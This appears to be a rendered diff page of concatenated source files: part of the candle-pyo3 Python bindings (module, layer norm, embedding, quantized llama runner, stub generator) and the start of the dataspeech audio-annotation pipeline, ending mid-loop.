+ raise TypeError('Module.to() received an invalid combination of arguments. Got: {}'.format(args))
1139
+ if kwargs:
1140
+ device = kwargs.get('device', device)
1141
+ dtype = str(kwargs.get('dtype', dtype))
1142
+ if device:
1143
+ device = device.lower()
1144
+ if dtype:
1145
+ dtype = dtype.lower()
1146
+ if dtype not in ['f32', 'f16', 'f64']:
1147
+ raise TypeError('candle.Module.to only accepts floating pointdtypes, but got desired dtype={}'.format(dtype))
1148
+
1149
+ def convert(t):
1150
+ if dtype:
1151
+ t = self.__cast_tensor(t, dtype)
1152
+ if device:
1153
+ t = self.__move_tensor_to_device(t, device)
1154
+ return t
1155
+ return self._apply(convert)
1156
+
1157
+ def __setattr__(self, __name: str, __value: Any) -> None:
1158
+ if isinstance(__value, Module):
1159
+ self._modules[__name] = __value
1160
+ elif isinstance(__value, QTensor):
1161
+ if __name in self._quantizable_buffers:
1162
+ type = __value.ggml_dtype.lower()
1163
+ if type in ['f32', 'f16']:
1164
+ dequant = __value.dequantize()
1165
+ if type == 'f16':
1166
+ dequant = dequant.to_dtype('f16')
1167
+ self._buffers[__name] = dequant
1168
+ else:
1169
+ self._buffers[__name] = __value
1170
+ else:
1171
+ self._buffers[__name] = __value.dequantize()
1172
+ elif isinstance(__value, Tensor):
1173
+ self._buffers[__name] = __value
1174
+ else:
1175
+ super().__setattr__(__name, __value)
1176
+
1177
+ def __getattr__(self, __name: str) -> Any:
1178
+ if '_modules' in self.__dict__:
1179
+ modules = self.__dict__['_modules']
1180
+ if __name in modules:
1181
+ return modules[__name]
1182
+ if '_buffers' in self.__dict__:
1183
+ tensors = self.__dict__['_buffers']
1184
+ if __name in tensors:
1185
+ return tensors[__name]
1186
+ return super().__getattribute__(__name)
1187
+
1188
+ def __delattr__(self, name):
1189
+ if name in self._buffers:
1190
+ del self._buffers[name]
1191
+ elif name in self._modules:
1192
+ del self._modules[name]
1193
+ else:
1194
+ super().__delattr__(name)
1195
+
1196
+ # File: candle-main/candle-pyo3/py_src/candle/nn/normalization.py
1197
+ import candle
1198
+ from candle import Tensor
1199
+ from .module import Module
1200
+ from typing import Union, List, Tuple, Optional, Any
1201
+ _shape_t = Union[int, List[int]]
1202
+ import numbers
1203
+
1204
+ class LayerNorm(Module):
1205
+ __constants__ = ['normalized_shape', 'eps']
1206
+ normalized_shape: Tuple[int, ...]
1207
+ eps: float
1208
+
1209
+ def __init__(self, normalized_shape: _shape_t, eps: float=1e-05, bias: bool=True, device=None, dtype=None) -> None:
1210
+ factory_kwargs = {'device': device, 'dtype': dtype}
1211
+ super().__init__()
1212
+ if isinstance(normalized_shape, numbers.Integral):
1213
+ normalized_shape = (normalized_shape,)
1214
+ self.normalized_shape = tuple(normalized_shape)
1215
+ self.eps = eps
1216
+ self.weight = candle.ones(normalized_shape, **factory_kwargs)
1217
+ if bias:
1218
+ self.bias = candle.zeros(normalized_shape, **factory_kwargs)
1219
+ else:
1220
+ self.bias = None
1221
+
1222
+ def forward(self, input: Tensor) -> Tensor:
1223
+ mean_x = input.sum_keepdim(2) / float(self.normalized_shape[-1])
1224
+ x = input.broadcast_sub(mean_x)
1225
+ norm_x = x.sqr().sum_keepdim(2) / float(self.normalized_shape[-1])
1226
+ x_normed = x.broadcast_div((norm_x + self.eps).sqrt())
1227
+ x = x_normed.broadcast_mul(self.weight)
1228
+ if self.bias:
1229
+ x = x.broadcast_add(self.bias)
1230
+ return x
1231
+
1232
+ def extra_repr(self) -> str:
1233
+ return '{normalized_shape}, eps={eps}, elementwise_affine={elementwise_affine}'.format(**self.__dict__)
1234
+
1235
+ # File: candle-main/candle-pyo3/py_src/candle/nn/sparse.py
1236
+ from .module import Module
1237
+ from typing import Optional, Tuple, Any
1238
+ from candle import Tensor
1239
+ import candle
1240
+
1241
+ class Embedding(Module):
1242
+
1243
+ def __init__(self, num_embeddings: int, embedding_dim: int, device=None) -> None:
1244
+ factory_kwargs = {'device': device}
1245
+ super().__init__()
1246
+ self.num_embeddings = num_embeddings
1247
+ self.embedding_dim = embedding_dim
1248
+ self.weight = candle.randn((num_embeddings, embedding_dim), **factory_kwargs)
1249
+
1250
+ def forward(self, indexes: Tensor) -> Tensor:
1251
+ final_dims = list(indexes.shape)
1252
+ final_dims.append(self.embedding_dim)
1253
+ indexes = indexes.flatten_all()
1254
+ values = self.weight.index_select(indexes, 0)
1255
+ return values.reshape(final_dims)
1256
+
1257
+ # File: candle-main/candle-pyo3/py_src/candle/typing/__init__.py
1258
+ from typing import TypeVar, Union, Sequence
1259
+ _T = TypeVar('_T')
1260
+ _ArrayLike = Union[_T, Sequence[_T], Sequence[Sequence[_T]], Sequence[Sequence[Sequence[_T]]], Sequence[Sequence[Sequence[Sequence[_T]]]]]
1261
+ CPU: str = 'cpu'
1262
+ CUDA: str = 'cuda'
1263
+ Device = TypeVar('Device', CPU, CUDA)
1264
+ Scalar = Union[int, float]
1265
+ Index = Union[int, slice, None, 'Ellipsis']
1266
+ Shape = Union[int, Sequence[int]]
1267
+
1268
+ # File: candle-main/candle-pyo3/quant-llama.py
1269
+ import sys
1270
+ from typing import Dict, Tuple, Any
1271
+ import candle
1272
+ from candle.models.llama import QuantizedLlama
1273
+ from candle import utils
1274
+ MAX_SEQ_LEN = 4096
1275
+
1276
+ def gguf_rename(tensor_name: str):
1277
+ if tensor_name == 'token_embd.weight':
1278
+ return 'tok_embeddings.weight'
1279
+ if tensor_name == 'output_norm.weight':
1280
+ return 'norm.weight'
1281
+ tensor_name = tensor_name.replace('blk.', 'layers.')
1282
+ tensor_name = tensor_name.replace('.attn_q.', '.attention.wq.')
1283
+ tensor_name = tensor_name.replace('.attn_k.', '.attention.wk.')
1284
+ tensor_name = tensor_name.replace('.attn_v.', '.attention.wv.')
1285
+ tensor_name = tensor_name.replace('.attn_output.', '.attention.wo.')
1286
+ tensor_name = tensor_name.replace('.ffn_gate.', '.feed_forward.w1.')
1287
+ tensor_name = tensor_name.replace('.ffn_down.', '.feed_forward.w2.')
1288
+ tensor_name = tensor_name.replace('.ffn_up.', '.feed_forward.w3.')
1289
+ tensor_name = tensor_name.replace('.attn_norm.', '.attention_norm.')
1290
+ return tensor_name
1291
+
1292
+ def main():
1293
+ if len(sys.argv) < 2:
1294
+ raise ValueError('missing weight file argument')
1295
+ filename = sys.argv[1]
1296
+ print(f'reading model file {filename}')
1297
+ if filename.endswith('gguf'):
1298
+ (all_tensors, metadata) = utils.load_gguf(filename)
1299
+ vocab = metadata['tokenizer.ggml.tokens']
1300
+ for (i, v) in enumerate(vocab):
1301
+ vocab[i] = '\n' if v == '<0x0A>' else v.replace('▁', ' ')
1302
+ hparams = {k: v for (k, v) in metadata.items() if not k.startswith('tokenizer')}
1303
+ print(hparams)
1304
+ hparams = {'n_vocab': len(vocab), 'n_embd': metadata['llama.embedding_length'], 'n_mult': 256, 'n_head': metadata['llama.attention.head_count'], 'n_head_kv': metadata['llama.attention.head_count_kv'], 'n_layer': metadata['llama.block_count'], 'n_rot': metadata['llama.rope.dimension_count'], 'rope_freq': metadata.get('llama.rope.freq_base', 10000.0), 'ftype': metadata['general.file_type'], 'context_length': metadata['llama.context_length']}
1305
+ all_tensors = {gguf_rename(k): v for (k, v) in all_tensors.items()}
1306
+ else:
1307
+ (all_tensors, hparams, vocab) = utils.load_ggml(filename)
1308
+ hparams['context_length'] = 2048
1309
+ print(hparams)
1310
+ model = QuantizedLlama(hparams, all_tensors)
1311
+ print('model built, starting inference')
1312
+ tokens = [1]
1313
+ for token_idx in range(500):
1314
+ last_token = tokens[-1]
1315
+ lt = candle.tensor([last_token]).unsqueeze(0)
1316
+ logits = model.forward(lt, len(tokens))
1317
+ m = logits.get(0).argmax_keepdim(-1)
1318
+ next_token = m.values()[0]
1319
+ print(vocab[next_token], end='', flush=True)
1320
+ tokens.append(next_token)
1321
+ if __name__ == '__main__':
1322
+ main()
1323
+
1324
+ # File: candle-main/candle-pyo3/stub.py
1325
+ import argparse
1326
+ import inspect
1327
+ import os
1328
+ from typing import Optional
1329
+ import black
1330
+ from pathlib import Path
1331
+ import re
1332
+ INDENT = ' ' * 4
1333
+ GENERATED_COMMENT = '# Generated content DO NOT EDIT\n'
1334
+ TYPING = 'from typing import Any, Callable, Dict, List, Optional, Tuple, Union, Sequence\nfrom os import PathLike\n'
1335
+ CANDLE_SPECIFIC_TYPING = 'from candle.typing import _ArrayLike, Device, Scalar, Index, Shape\n'
1336
+ CANDLE_TENSOR_IMPORTS = 'from candle import Tensor,DType,QTensor\n'
1337
+ RETURN_TYPE_MARKER = '&RETURNS&: '
1338
+ ADDITIONAL_TYPEHINTS = {}
1339
+ FORWARD_REF_PATTERN = re.compile("ForwardRef\\('([^']+)'\\)")
1340
+
1341
+ def do_indent(text: Optional[str], indent: str):
1342
+ if text is None:
1343
+ return ''
1344
+ return text.replace('\n', f'\n{indent}')
1345
+
1346
+ def function(obj, indent: str, text_signature: str=None):
1347
+ if text_signature is None:
1348
+ text_signature = obj.__text_signature__
1349
+ text_signature = text_signature.replace('$self', 'self').lstrip().rstrip()
1350
+ doc_string = obj.__doc__
1351
+ if doc_string is None:
1352
+ doc_string = ''
1353
+ return_type = None
1354
+ doc_lines = doc_string.split('\n')
1355
+ if doc_lines[-1].lstrip().startswith(RETURN_TYPE_MARKER):
1356
+ return_type = doc_lines[-1].lstrip()[len(RETURN_TYPE_MARKER):].strip()
1357
+ doc_string = '\n'.join(doc_lines[:-1])
1358
+ string = ''
1359
+ if return_type:
1360
+ string += f'{indent}def {obj.__name__}{text_signature} -> {return_type}:\n'
1361
+ else:
1362
+ string += f'{indent}def {obj.__name__}{text_signature}:\n'
1363
+ indent += INDENT
1364
+ string += f'{indent}"""\n'
1365
+ string += f'{indent}{do_indent(doc_string, indent)}\n'
1366
+ string += f'{indent}"""\n'
1367
+ string += f'{indent}pass\n'
1368
+ string += '\n'
1369
+ string += '\n'
1370
+ return string
1371
+
1372
+ def member_sort(member):
1373
+ if inspect.isclass(member):
1374
+ value = 10 + len(inspect.getmro(member))
1375
+ else:
1376
+ value = 1
1377
+ return value
1378
+
1379
+ def fn_predicate(obj):
1380
+ value = inspect.ismethoddescriptor(obj) or inspect.isbuiltin(obj)
1381
+ if value:
1382
+ return obj.__text_signature__ and (not obj.__name__.startswith('_'))
1383
+ if inspect.isgetsetdescriptor(obj):
1384
+ return not obj.__name__.startswith('_')
1385
+ return False
1386
+
1387
+ def get_module_members(module):
1388
+ members = [member for (name, member) in inspect.getmembers(module) if not name.startswith('_') and (not inspect.ismodule(member))]
1389
+ members.sort(key=member_sort)
1390
+ return members
1391
+
1392
+ def pyi_file(obj, indent=''):
1393
+ string = ''
1394
+ if inspect.ismodule(obj):
1395
+ string += GENERATED_COMMENT
1396
+ string += TYPING
1397
+ string += CANDLE_SPECIFIC_TYPING
1398
+ if obj.__name__ != 'candle.candle':
1399
+ string += CANDLE_TENSOR_IMPORTS
1400
+ members = get_module_members(obj)
1401
+ for member in members:
1402
+ string += pyi_file(member, indent)
1403
+ elif inspect.isclass(obj):
1404
+ indent += INDENT
1405
+ mro = inspect.getmro(obj)
1406
+ if len(mro) > 2:
1407
+ inherit = f'({mro[1].__name__})'
1408
+ else:
1409
+ inherit = ''
1410
+ string += f'class {obj.__name__}{inherit}:\n'
1411
+ body = ''
1412
+ if obj.__doc__:
1413
+ body += f'{indent}"""\n{indent}{do_indent(obj.__doc__, indent)}\n{indent}"""\n'
1414
+ fns = inspect.getmembers(obj, fn_predicate)
1415
+ if obj.__text_signature__:
1416
+ body += f'{indent}def __init__{obj.__text_signature__}:\n'
1417
+ body += f'{indent + INDENT}pass\n'
1418
+ body += '\n'
1419
+ if obj.__name__ in ADDITIONAL_TYPEHINTS:
1420
+ additional_members = inspect.getmembers(ADDITIONAL_TYPEHINTS[obj.__name__])
1421
+ additional_functions = []
1422
+ for (name, member) in additional_members:
1423
+ if inspect.isfunction(member):
1424
+ additional_functions.append((name, member))
1425
+
1426
+ def process_additional_function(fn):
1427
+ signature = inspect.signature(fn)
1428
+ cleaned_signature = re.sub(FORWARD_REF_PATTERN, '\\1', str(signature))
1429
+ string = f'{indent}def {fn.__name__}{cleaned_signature}:\n'
1430
+ string += f'{indent + INDENT}"""{indent + INDENT}{do_indent(fn.__doc__, indent + INDENT)}{indent + INDENT}"""\n'
1431
+ string += f'{indent + INDENT}pass\n'
1432
+ string += '\n'
1433
+ return string
1434
+ for (name, fn) in additional_functions:
1435
+ body += process_additional_function(fn)
1436
+ for (name, fn) in fns:
1437
+ body += pyi_file(fn, indent=indent)
1438
+ if not body:
1439
+ body += f'{indent}pass\n'
1440
+ string += body
1441
+ string += '\n\n'
1442
+ elif inspect.isbuiltin(obj):
1443
+ string += f'{indent}@staticmethod\n'
1444
+ string += function(obj, indent)
1445
+ elif inspect.ismethoddescriptor(obj):
1446
+ string += function(obj, indent)
1447
+ elif inspect.isgetsetdescriptor(obj):
1448
+ string += f'{indent}@property\n'
1449
+ string += function(obj, indent, text_signature='(self)')
1450
+ elif obj.__class__.__name__ == 'DType':
1451
+ string += f'class {str(obj).lower()}(DType):\n'
1452
+ string += f'{indent + INDENT}pass\n'
1453
+ else:
1454
+ raise Exception(f'Object {obj} is not supported')
1455
+ return string
1456
+
1457
+ def py_file(module, origin):
1458
+ members = get_module_members(module)
1459
+ string = GENERATED_COMMENT
1460
+ string += f'from .. import {origin}\n'
1461
+ string += '\n'
1462
+ for member in members:
1463
+ if hasattr(member, '__name__'):
1464
+ name = member.__name__
1465
+ else:
1466
+ name = str(member)
1467
+ string += f'{name} = {origin}.{name}\n'
1468
+ return string
1469
+
1470
+ def do_black(content, is_pyi):
1471
+ mode = black.Mode(target_versions={black.TargetVersion.PY35}, line_length=119, is_pyi=is_pyi, string_normalization=True)
1472
+ try:
1473
+ return black.format_file_contents(content, fast=True, mode=mode)
1474
+ except black.NothingChanged:
1475
+ return content
1476
+
1477
+ def write(module, directory, origin, check=False):
1478
+ submodules = [(name, member) for (name, member) in inspect.getmembers(module) if inspect.ismodule(member)]
1479
+ filename = os.path.join(directory, '__init__.pyi')
1480
+ pyi_content = pyi_file(module)
1481
+ pyi_content = do_black(pyi_content, is_pyi=True)
1482
+ os.makedirs(directory, exist_ok=True)
1483
+ if check:
1484
+ with open(filename, 'r') as f:
1485
+ data = f.read()
1486
+ print('generated content')
1487
+ print(pyi_content)
1488
+ assert data == pyi_content, f'The content of {filename} seems outdated, please run `python stub.py`'
1489
+ else:
1490
+ with open(filename, 'w') as f:
1491
+ f.write(pyi_content)
1492
+ filename = os.path.join(directory, '__init__.py')
1493
+ py_content = py_file(module, origin)
1494
+ py_content = do_black(py_content, is_pyi=False)
1495
+ os.makedirs(directory, exist_ok=True)
1496
+ is_auto = False
1497
+ if not os.path.exists(filename):
1498
+ is_auto = True
1499
+ else:
1500
+ with open(filename, 'r') as f:
1501
+ line = f.readline()
1502
+ if line == GENERATED_COMMENT:
1503
+ is_auto = True
1504
+ if is_auto:
1505
+ if check:
1506
+ with open(filename, 'r') as f:
1507
+ data = f.read()
1508
+ print('generated content')
1509
+ print(py_content)
1510
+ assert data == py_content, f'The content of {filename} seems outdated, please run `python stub.py`'
1511
+ else:
1512
+ with open(filename, 'w') as f:
1513
+ f.write(py_content)
1514
+ for (name, submodule) in submodules:
1515
+ write(submodule, os.path.join(directory, name), f'{name}', check=check)
1516
+
1517
+ def extract_additional_types(module):
1518
+ additional_types = {}
1519
+ for (name, member) in inspect.getmembers(module):
1520
+ if inspect.isclass(member):
1521
+ if hasattr(member, '__name__'):
1522
+ name = member.__name__
1523
+ else:
1524
+ name = str(member)
1525
+ if name not in additional_types:
1526
+ additional_types[name] = member
1527
+ return additional_types
1528
+ if __name__ == '__main__':
1529
+ parser = argparse.ArgumentParser()
1530
+ parser.add_argument('--check', action='store_true')
1531
+ args = parser.parse_args()
1532
+ cwd = Path.cwd()
1533
+ directory = 'py_src/candle/'
1534
+ if cwd.name != 'candle-pyo3':
1535
+ directory = f'candle-pyo3/{directory}'
1536
+ import candle
1537
+ import _additional_typing
1538
+ ADDITIONAL_TYPEHINTS = extract_additional_types(_additional_typing)
1539
+ write(candle.candle, directory, 'candle', check=args.check)
1540
+
huggingface_controlnet_aux.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_dataset-viewer.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_datasets.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_dataspeech.txt ADDED
@@ -0,0 +1,220 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: dataspeech-main/dataspeech/cpu_enrichments/rate.py
2
+ from g2p import make_g2p
3
+ transducer = make_g2p('eng', 'eng-ipa')
4
+
5
+ def rate_apply(batch, rank=None, audio_column_name='audio', text_column_name='text'):
6
+ if isinstance(batch[text_column_name], list):
7
+ speaking_rates = []
8
+ phonemes_list = []
9
+ if 'speech_duration' in batch:
10
+ for (text, audio_duration) in zip(batch[text_column_name], batch['speech_duration']):
11
+ phonemes = transducer(text).output_string
12
+ audio_duration = audio_duration if audio_duration != 0 else 0.01
13
+ speaking_rate = len(phonemes) / audio_duration
14
+ speaking_rates.append(speaking_rate)
15
+ phonemes_list.append(phonemes)
16
+ else:
17
+ for (text, audio) in zip(batch[text_column_name], batch[audio_column_name]):
18
+ phonemes = transducer(text).output_string
19
+ sample_rate = audio['sampling_rate']
20
+ audio_length = len(audio['array'].squeeze()) / sample_rate
21
+ speaking_rate = len(phonemes) / audio_length
22
+ speaking_rates.append(speaking_rate)
23
+ phonemes_list.append(phonemes)
24
+ batch['speaking_rate'] = speaking_rates
25
+ batch['phonemes'] = phonemes_list
26
+ else:
27
+ phonemes = transducer(batch[text_column_name]).output_string
28
+ if 'speech_duration' in batch:
29
+ audio_length = batch['speech_duration'] if batch['speech_duration'] != 0 else 0.01
30
+ else:
31
+ sample_rate = batch[audio_column_name]['sampling_rate']
32
+ audio_length = len(batch[audio_column_name]['array'].squeeze()) / sample_rate
33
+ speaking_rate = len(phonemes) / audio_length
34
+ batch['speaking_rate'] = speaking_rate
35
+ batch['phonemes'] = phonemes
36
+ return batch
37
+
38
+ # File: dataspeech-main/dataspeech/gpu_enrichments/pitch.py
39
+ import torch
40
+ import penn
41
+ hopsize = 0.01
42
+ fmin = 30.0
43
+ fmax = 1000.0
44
+ checkpoint = None
45
+ center = 'half-hop'
46
+ interp_unvoiced_at = 0.065
47
+
48
+ def pitch_apply(batch, rank=None, audio_column_name='audio', output_column_name='utterance_pitch', penn_batch_size=4096):
49
+ if isinstance(batch[audio_column_name], list):
50
+ utterance_pitch_mean = []
51
+ utterance_pitch_std = []
52
+ for sample in batch[audio_column_name]:
53
+ (pitch, periodicity) = penn.from_audio(torch.tensor(sample['array'][None, :]).float(), sample['sampling_rate'], hopsize=hopsize, fmin=fmin, fmax=fmax, checkpoint=checkpoint, batch_size=penn_batch_size, center=center, interp_unvoiced_at=interp_unvoiced_at, gpu=(rank or 0) % torch.cuda.device_count() if torch.cuda.device_count() > 0 else rank)
54
+ utterance_pitch_mean.append(pitch.mean().cpu())
55
+ utterance_pitch_std.append(pitch.std().cpu())
56
+ batch[f'{output_column_name}_mean'] = utterance_pitch_mean
57
+ batch[f'{output_column_name}_std'] = utterance_pitch_std
58
+ else:
59
+ sample = batch[audio_column_name]
60
+ (pitch, periodicity) = penn.from_audio(torch.tensor(sample['array'][None, :]).float(), sample['sampling_rate'], hopsize=hopsize, fmin=fmin, fmax=fmax, checkpoint=checkpoint, batch_size=penn_batch_size, center=center, interp_unvoiced_at=interp_unvoiced_at, gpu=(rank or 0) % torch.cuda.device_count() if torch.cuda.device_count() > 0 else rank)
61
+ batch[f'{output_column_name}_mean'] = pitch.mean().cpu()
62
+ batch[f'{output_column_name}_std'] = pitch.std().cpu()
63
+ return batch
64
+
65
+ # File: dataspeech-main/dataspeech/gpu_enrichments/snr_and_reverb.py
66
+ from pyannote.audio import Model
67
+ from pathlib import Path
68
+ from brouhaha.pipeline import RegressiveActivityDetectionPipeline
69
+ import torch
70
+ from huggingface_hub import hf_hub_download
71
+ import numpy as np
72
+ model = None
73
+ ratio = 16000 / 270
74
+
75
+ def snr_apply(batch, rank=None, audio_column_name='audio', batch_size=32):
76
+ global model
77
+ if model is None:
78
+ model = Model.from_pretrained(Path(hf_hub_download(repo_id='ylacombe/brouhaha-best', filename='best.ckpt')), strict=False)
79
+ if rank is not None or torch.cuda.device_count() > 0:
80
+ device = f'cuda:{(rank or 0) % torch.cuda.device_count()}'
81
+ model.to(device)
82
+ pipeline = RegressiveActivityDetectionPipeline(segmentation=model, batch_size=batch_size)
83
+ if rank:
84
+ pipeline.to(torch.device(device))
85
+ device = pipeline._models['segmentation'].device
86
+ if isinstance(batch[audio_column_name], list):
87
+ snr = []
88
+ c50 = []
89
+ vad_durations = []
90
+ for sample in batch[audio_column_name]:
91
+ res = pipeline({'sample_rate': sample['sampling_rate'], 'waveform': torch.tensor(sample['array'][None, :]).to(device).float()})
92
+ mask = np.full(res['snr'].shape, False)
93
+ for (segment, _) in res['annotation'].itertracks():
94
+ start = int(segment.start * ratio)
95
+ end = int(segment.end * ratio)
96
+ mask[start:end] = True
97
+ mask = ~((res['snr'] == 0.0) & (res['c50'] == 0.0)) & mask
98
+ vad_duration = sum(map(lambda x: x[0].duration, res['annotation'].itertracks()))
99
+ snr.append(res['snr'][mask].mean())
100
+ c50.append(res['c50'][mask].mean())
101
+ vad_durations.append(np.float32(vad_duration))
102
+ batch['snr'] = snr
103
+ batch['c50'] = c50
104
+ batch['speech_duration'] = vad_durations
105
+ else:
106
+ res = pipeline({'sample_rate': batch[audio_column_name]['sampling_rate'], 'waveform': torch.tensor(batch[audio_column_name]['array'][None, :]).to(device).float()})
107
+ mask = np.full(res['snr'].shape, False)
108
+ for (segment, _) in res['annotation'].itertracks():
109
+ start = int(segment.start * ratio)
110
+ end = int(segment.end * ratio)
111
+ mask[start:end] = True
112
+ mask = ~((res['snr'] == 0.0) & (res['c50'] == 0.0)) & mask
113
+ vad_duration = sum(map(lambda x: x[0].duration, res['annotation'].itertracks()))
114
+ batch['snr'] = res['snr'][mask].mean()
115
+ batch['c50'] = res['c50'][mask].mean()
116
+ batch['speech_duration'] = vad_duration
117
+ return batch
118
+
119
+ # File: dataspeech-main/dataspeech/gpu_enrichments/squim.py
120
+ from torchaudio.pipelines import SQUIM_OBJECTIVE
121
+ import torch
122
+ import torchaudio
123
+ model = None
124
+ max_audio_length = 15 * SQUIM_OBJECTIVE.sample_rate
125
+
126
+ def squim_apply(batch, rank=None, audio_column_name='audio'):
127
+ global model
128
+ if model is None:
129
+ model = SQUIM_OBJECTIVE.get_model()
130
+ if rank is not None or torch.cuda.device_count() > 0:
131
+ device = f'cuda:{(rank or 0) % torch.cuda.device_count()}'
132
+ model.to(device)
133
+ else:
134
+ device = 'cpu'
135
+ if isinstance(batch[audio_column_name], list):
136
+ sdr = []
137
+ pesq = []
138
+ stoi = []
139
+ for sample in batch[audio_column_name]:
140
+ waveform = torchaudio.functional.resample(torch.tensor(sample['array'])[None, :].to(device).float(), sample['sampling_rate'], SQUIM_OBJECTIVE.sample_rate)
141
+ with torch.no_grad():
142
+ waveform = waveform[:, :min(max_audio_length, waveform.shape[1])]
143
+ (stoi_sample, pesq_sample, sdr_sample) = model(waveform)
144
+ sdr.append(sdr_sample.cpu()[0])
145
+ pesq.append(pesq_sample.cpu()[0])
146
+ stoi.append(stoi_sample.cpu()[0])
147
+ batch['sdr'] = sdr
148
+ batch['pesq'] = pesq
149
+ batch['stoi'] = stoi
150
+ else:
151
+ waveform = torchaudio.functional.resample(torch.tensor(batch[audio_column_name]['array'][None, :]).to(device).float(), batch[audio_column_name]['sampling_rate'], SQUIM_OBJECTIVE.sample_rate)
152
+ with torch.no_grad():
153
+ (stoi_sample, pesq_sample, sdr_sample) = model(waveform)
154
+ batch['sdr'] = sdr_sample.cpu()[0]
155
+ batch['pesq'] = pesq_sample.cpu()[0]
156
+ batch['stoi'] = stoi_sample.cpu()[0]
157
+ return batch
158
+
159
+ # File: dataspeech-main/main.py
160
+ from datasets import load_dataset, Audio
161
+ from multiprocess import set_start_method
162
+ from dataspeech import rate_apply, pitch_apply, snr_apply, squim_apply
163
+ import torch
164
+ import argparse
165
+ if __name__ == '__main__':
166
+ set_start_method('spawn')
167
+ parser = argparse.ArgumentParser()
168
+ parser.add_argument('dataset_name', type=str, help='Path or name of the dataset. See: https://huggingface.co/docs/datasets/v2.17.0/en/package_reference/loading_methods#datasets.load_dataset.path')
169
+ parser.add_argument('--configuration', default=None, type=str, help='Dataset configuration to use, if necessary.')
170
+ parser.add_argument('--output_dir', default=None, type=str, help='If specified, save the dataset on disk with this path.')
171
+ parser.add_argument('--repo_id', default=None, type=str, help='If specified, push the dataset to the hub.')
172
+ parser.add_argument('--audio_column_name', default='audio', type=str, help='Column name of the audio column to be enriched.')
173
+ parser.add_argument('--text_column_name', default='text', type=str, help='Text column name.')
174
+ parser.add_argument('--rename_column', action='store_true', help="If activated, rename audio and text column names to 'audio' and 'text'. Useful if you want to merge datasets afterwards.")
175
+ parser.add_argument('--cpu_num_workers', default=1, type=int, help="Number of CPU workers for transformations that don't use GPUs or if no GPU are available.")
176
+ parser.add_argument('--cpu_writer_batch_size', default=1000, type=int, help="writer_batch_size for transformations that don't use GPUs. See: https://huggingface.co/docs/datasets/v2.17.0/en/package_reference/main_classes#datasets.Dataset.map.writer_batch_size")
177
+ parser.add_argument('--batch_size', default=2, type=int, help='This parameters specify how many samples are passed by workers for operations that are using GPUs.')
178
+ parser.add_argument('--penn_batch_size', default=4096, type=int, help="Pitch estimation chunks audio into smaller pieces and processes them in batch. This specify the batch size. If you are using a gpu, pick a batch size that doesn't cause memory errors.")
179
+ parser.add_argument('--num_workers_per_gpu_for_pitch', default=1, type=int, help='Number of workers per GPU for the pitch estimation if GPUs are available. Defaults to 1 if some are avaiable. Useful if you want multiple processes per GPUs to maximise GPU usage.')
180
+ parser.add_argument('--num_workers_per_gpu_for_snr', default=1, type=int, help='Number of workers per GPU for the SNR and reverberation estimation if GPUs are available. Defaults to 1 if some are avaiable. Useful if you want multiple processes per GPUs to maximise GPU usage.')
181
+ parser.add_argument('--apply_squim_quality_estimation', action='store_true', help='If set, will also use torchaudio-squim estimation (SI-SNR, STOI and PESQ).')
182
+ parser.add_argument('--num_workers_per_gpu_for_squim', default=1, type=int, help='Number of workers per GPU for the SI-SNR, STOI and PESQ estimation if GPUs are available. Defaults to 1 if some are avaiable. Useful if you want multiple processes per GPUs to maximise GPU usage.')
183
+ args = parser.parse_args()
184
+ if args.configuration:
185
+ dataset = load_dataset(args.dataset_name, args.configuration, num_proc=args.cpu_num_workers)
186
+ else:
187
+ dataset = load_dataset(args.dataset_name, num_proc=args.cpu_num_workers)
188
+ audio_column_name = 'audio' if args.rename_column else args.audio_column_name
189
+ text_column_name = 'text' if args.rename_column else args.text_column_name
190
+ if args.rename_column:
191
+ dataset = dataset.rename_columns({args.audio_column_name: 'audio', args.text_column_name: 'text'})
192
+ if args.apply_squim_quality_estimation:
193
+ print('Compute SI-SDR, PESQ, STOI')
194
+ squim_dataset = dataset.map(squim_apply, batched=True, batch_size=args.batch_size, with_rank=True if torch.cuda.device_count() > 0 else False, num_proc=torch.cuda.device_count() * args.num_workers_per_gpu_for_squim if torch.cuda.device_count() > 0 else args.cpu_num_workers, remove_columns=[audio_column_name], fn_kwargs={'audio_column_name': audio_column_name})
195
+ print('Compute pitch')
196
+ pitch_dataset = dataset.cast_column(audio_column_name, Audio(sampling_rate=16000)).map(pitch_apply, batched=True, batch_size=args.batch_size, with_rank=True if torch.cuda.device_count() > 0 else False, num_proc=torch.cuda.device_count() * args.num_workers_per_gpu_for_pitch if torch.cuda.device_count() > 0 else args.cpu_num_workers, remove_columns=[audio_column_name], fn_kwargs={'audio_column_name': audio_column_name, 'penn_batch_size': args.penn_batch_size})
197
+ print('Compute snr and reverb')
198
+ snr_dataset = dataset.map(snr_apply, batched=True, batch_size=args.batch_size, with_rank=True if torch.cuda.device_count() > 0 else False, num_proc=torch.cuda.device_count() * args.num_workers_per_gpu_for_snr if torch.cuda.device_count() > 0 else args.cpu_num_workers, remove_columns=[audio_column_name], fn_kwargs={'audio_column_name': audio_column_name})
199
+ print('Compute speaking rate')
200
+ if 'speech_duration' in snr_dataset[next(iter(snr_dataset.keys()))].features:
201
+ rate_dataset = snr_dataset.map(rate_apply, with_rank=False, num_proc=args.cpu_num_workers, writer_batch_size=args.cpu_writer_batch_size, fn_kwargs={'audio_column_name': audio_column_name, 'text_column_name': text_column_name})
202
+ else:
203
+ rate_dataset = dataset.map(rate_apply, with_rank=False, num_proc=args.cpu_num_workers, writer_batch_size=args.cpu_writer_batch_size, remove_columns=[audio_column_name], fn_kwargs={'audio_column_name': audio_column_name, 'text_column_name': text_column_name})
204
+ for split in dataset.keys():
205
